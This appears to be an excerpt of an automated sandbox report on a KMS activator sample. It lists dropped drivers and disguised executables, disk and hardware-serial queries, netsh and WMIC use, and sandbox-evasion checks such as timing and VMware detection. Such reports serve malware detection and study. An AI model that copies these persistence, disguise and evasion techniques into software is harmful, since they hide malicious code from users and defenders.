Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe Code function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR DeviceIoControl() %d, DFP_GET_VERSION) returned 0, error is %d 3_2_00BF2A30
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe Code function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR No device found at iPosition %d (%d) 3_2_00BF2A30
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe Code function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 3_2_00BF2CF0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe Code function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTUsingSmart ERROR, CreateFileA(%s) returned INVALID_HANDLE_VALUE Error Code %d 3_2_00BF2CF0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe Code function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTUsingSmart ERROR DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d 3_2_00BF2CF0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe Code function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive%d 3_2_00BF30D0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe Code function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, %d ReadPhysicalDriveInNTWithZeroRights ERROR CreateFileA(%s) returned INVALID_HANDLE_VALUE 3_2_00BF30D0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe Code function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, %s ReadPhysicalDriveInNTWithZeroRights ERROR DeviceIoControl(), IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0 3_2_00BF30D0
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe Executable created and started: C:\Windows\_temp07242019502489\7Z.EXE
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe Executable created and started: C:\Windows\system32\drivers\DvLayout.exe
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe Executable created and started: C:\Windows\_temp07242019502489\kms_x64.exe
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe File created: C:\Windows\system32\drivers\KMDF_LOOK.sys
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe File created: C:\Windows\system32\drivers\KMDF_Protect.sys
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x86\SetACL.exe
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\kms-client.exe
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe File created: C:\Users\user\AppData\Local\Temp\nsoB6EE.tmp\System.dll
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe File created: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wccenter.exe
Source: C:\Windows\System32\drivers\DvLayout.exe File created: C:\Windows\system32\drivers\CbDServices.sys (copy)
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\kms-server.exe
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe File created: C:\Windows\System32\drivers\DvLayout.exe
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\kms.exe
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe File created: C:\Windows\_temp07242019502489\7Z.EXE
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe File created: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x86\cleanospp.exe
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x86\SECOPatcher.dll
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe File created: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wdlogin.exe
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe File created: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x86\msvcr100.dll
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe File created: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe File created: C:\Windows\System32\drivers\KMDF_Protect.sys
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe File created: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wuhost.exe
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x64\SppExtComObjHook.dll
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x64\msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe File created: C:\Windows\HeuKmsRenewal\HEU_KMS_Activator.exe
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\kms_x64.exe
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x64\SetACL.exe
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x64\SECOPatcher.dll
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe File created: C:\Windows\System32\drivers\KMDF_LOOK.sys
Source: C:\Windows\System32\drivers\DvLayout.exe File created: C:\Windows\system32\drivers\mvtnom.sys (copy)
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x64\cleanospp.exe
Source: C:\Windows\_temp07242019502489\7Z.EXE File created: C:\Windows\_temp07242019502489\x86\SppExtComObjHook.dll
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe File created: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d2_2_00632A30
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR ,CreateFileA(%s) returned INVALID_HANDLE_VALUE2_2_00632A30
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR DeviceIoControl() %d, DFP_GET_VERSION) returned 0, error is %d2_2_00632A30
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR No device found at iPosition %d (%d)2_2_00632A30
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d2_2_00632CF0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTUsingSmart ERROR, CreateFileA(%s) returned INVALID_HANDLE_VALUE Error Code %d2_2_00632CF0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTUsingSmart ERROR DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d2_2_00632CF0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive%d2_2_006330D0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, %d ReadPhysicalDriveInNTWithZeroRights ERROR CreateFileA(%s) returned INVALID_HANDLE_VALUE2_2_006330D0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, %s ReadPhysicalDriveInNTWithZeroRights ERROR DeviceIoControl(), IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 02_2_006330D0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d3_2_00BF2A30
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR ,CreateFileA(%s) returned INVALID_HANDLE_VALUE3_2_00BF2A30
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR DeviceIoControl() %d, DFP_GET_VERSION) returned 0, error is %d3_2_00BF2A30
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR No device found at iPosition %d (%d)3_2_00BF2A30
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d3_2_00BF2CF0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTUsingSmart ERROR, CreateFileA(%s) returned INVALID_HANDLE_VALUE Error Code %d3_2_00BF2CF0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTUsingSmart ERROR DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d3_2_00BF2CF0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive%d3_2_00BF30D0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, %d ReadPhysicalDriveInNTWithZeroRights ERROR CreateFileA(%s) returned INVALID_HANDLE_VALUE3_2_00BF30D0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, %s ReadPhysicalDriveInNTWithZeroRights ERROR DeviceIoControl(), IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 03_2_00BF30D0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_00631D50 GetModuleFileNameW,CreateEventW,StartServiceCtrlDispatcherW,CloseHandle,Sleep,CopyFileW,Sleep,GetLastError,__CxxThrowException@8,2_2_00631D50
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C7E9BC GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00C7E9BC
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drivers\DvLayout.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\_temp07242019502489\kms_x64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\_temp07242019502489\kms_x64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\_temp07242019502489\kms_x64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\_temp07242019502489\kms_x64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.1
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeMemory allocated: 5500000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeMemory allocated: ABA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeMemory allocated: C520000 memory reserve | memory write watch
Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_00377050 rdtsc 11_2_00377050
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: GetAdaptersInfo,17_2_00E6C290
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeWindow / User API: foregroundWindowGot 1580
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wuhost.exe
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x86\SetACL.exe
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x64\SppExtComObjHook.dll
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x64\msvcr100.dll
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\kms-client.exe
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wccenter.exe
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsoB6EE.tmp\System.dll
Source: C:\Windows\System32\drivers\DvLayout.exeDropped PE file which has not been started: C:\Windows\system32\drivers\CbDServices.sys (copy)
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x64\SetACL.exe
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\kms-server.exe
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x64\SECOPatcher.dll
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeDropped PE file which has not been started: C:\Windows\System32\drivers\KMDF_LOOK.sys
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\kms.exe
Source: C:\Windows\System32\drivers\DvLayout.exeDropped PE file which has not been started: C:\Windows\system32\drivers\mvtnom.sys (copy)
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x86\SECOPatcher.dll
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x86\cleanospp.exe
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x64\cleanospp.exe
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x86\SppExtComObjHook.dll
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wdlogin.exe
Source: C:\Windows\_temp07242019502489\7Z.EXEDropped PE file which has not been started: C:\Windows\_temp07242019502489\x86\msvcr100.dll
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeDropped PE file which has not been started: C:\Windows\System32\drivers\KMDF_Protect.sys
Source: C:\Windows\System32\drivers\DvLayout.exeEvasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeAPI coverage: 6.7 %
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe TID: 6340Thread sleep time: -55000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6388Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeFile opened: PhysicalDrive0
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_00374A40 GetLocalTime followed by cmp: cmp edx, 08h and CTI: jc 00374D1Fh11_2_00374A40
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_00374A40 GetLocalTime followed by cmp: cmp eax, 1fh and CTI: jnbe 00374D44h11_2_00374A40
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E61930 GetLocalTime followed by cmp: cmp edx, 08h and CTI: jc 00E61BD8h17_2_00E61930
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00E61930 GetLocalTime followed by cmp: cmp eax, 1fh and CTI: jnbe 00E61C02h17_2_00E61930
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformation
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_00405F2F FindFirstFileA,FindClose,1_2_00405F2F
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_004064DB DeleteFileA,CloseHandle,lstrcatA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_004064DB
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_00402C3F FindFirstFileA,1_2_00402C3F
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006DFA19 FindFirstFileExW,2_2_006DFA19
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C9FA19 FindFirstFileExW,3_2_00C9FA19
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_00396627 FindFirstFileExW,11_2_00396627
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00ED31AF FindFirstFileExW,17_2_00ED31AF
